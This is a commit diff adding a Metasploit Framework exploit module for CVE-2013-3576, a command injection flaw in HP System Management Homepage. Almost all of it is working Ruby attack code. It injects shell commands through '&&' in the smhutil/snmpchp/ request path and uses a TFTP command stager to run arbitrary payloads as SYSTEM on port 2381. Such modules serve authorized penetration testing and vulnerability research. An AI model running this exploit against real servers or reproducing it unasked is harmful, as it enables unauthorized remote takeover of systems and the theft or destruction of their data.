Add CVE-2013-3576 - HP System Management Homepage exploit

Author: wchen-r7

modules/exploits/windows/http/hp_sys_mgmt_exec.rb

@@ -0,0 +1,94 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::CmdStagerTFTP
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "HP System Management Homepage JustGetSNMPQueue Command Injection",
+			'Description'    => %q{
+				This module exploits a vulnerability found in HP System Management Homepage.  By
+				supplying a specially crafted HTTP request, it is possible to control the
+				'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc),
+				which will be used in a exec() function.  This results in arbitrary code execution
+				under the context of SYSTEM.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Markus Wulftange',
+					'sinn3r'  #Metasploit
+				],
+			'References'     =>
+				[
+					['CVE', '2013-3576'],
+					['OSVDB', '94191'],
+					['US-CERT-VU', '735364']
+				],
+			'Payload'        =>
+				{
+					'BadChars' => "\x00"
+				},
+			'DefaultOptions' =>
+				{
+					'SSL' => true
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					['Windows', {}],
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "Jun 11 2013",
+			'DefaultTarget'  => 0))
+		register_options(
+			[
+				Opt::RPORT(2381)
+			], self.class)
+	end
+
+	def peer
+		"#{rhost}:#{rport}"
+	end
+
+	def check
+		sig = Rex::Text.rand_text_alpha(10)
+		cmd = Rex::Text.uri_encode("echo #{sig}")
+		uri = normalize_uri("smhutil", "snmpchp/") + "&&#{cmd}&&echo"
+
+		res = send_request_raw({'uri' => uri})
+		if not res
+			print_error("#{peer} - Connection timed out")
+			return Exploit::CheckCode::Unknown
+		end
+
+		return Exploit::CheckCode::Vulnerable if res.body =~ /#{sig}/
+		Exploit::CheckCode::Safe
+	end
+
+	def setup_stager
+		execute_cmdstager({ :temp => '.'})
+	end
+
+	def execute_command(cmd, opts={})
+		# Payload will be: C:\hp\hpsmh\data\htdocs\smhutil
+		uri = Rex::Text.uri_encode("#{@uri}#{cmd}&&echo")
+		print_status("#{peer} - Executing: #{cmd}")
+		res = send_request_raw({'uri' => uri})
+	end
+
+	def exploit
+		@uri = normalize_uri('smhutil', 'snmpchp/') + "&&"
+		setup_stager
+	end
+end